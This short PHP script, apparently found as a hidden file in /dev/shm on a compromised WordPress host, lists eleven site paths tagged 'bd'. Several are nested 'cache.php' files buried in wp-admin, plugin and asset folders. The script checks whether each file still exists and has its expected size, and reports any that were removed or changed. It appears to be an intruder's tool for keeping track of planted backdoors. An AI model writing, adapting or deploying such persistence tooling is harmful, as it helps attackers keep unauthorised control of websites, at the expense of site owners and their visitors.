File: //dev/shm/.k
<?php $r = '/home/agyiyodo/public_html'; $x = ["/wp-settings.php"=>"bd@@518086@@50",
"/wp-admin/includes/includes/includes/cache.php"=>"bd@@1115977@@27",
"/wp-admin/admin-header.php"=>"bd@@1120258@@28",
"/wp-admin/ms-users.php"=>"bd@@1120259@@31",
"/wp-admin/link-parse-opml.php"=>"bd@@518142@@92",
"/nc_assets/img/img/img/cache.php"=>"bd@@1120253@@55",
"/plala10/Sites/cgi-binsso/pf/pf/pf/cache.php"=>"bd@@1115506@@16",
"/wp-admin/custom-background.php"=>"bd@@1115976@@2",
"/wp-content/plugins/elementor/modules/variables/classes/classes/cache.php"=>"bd@@1114894@@70",
"/wp-activate.php"=>"bd@@1115666@@93",
"/wp-admin/options-general.php"=>"bd@@1115980@@1"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');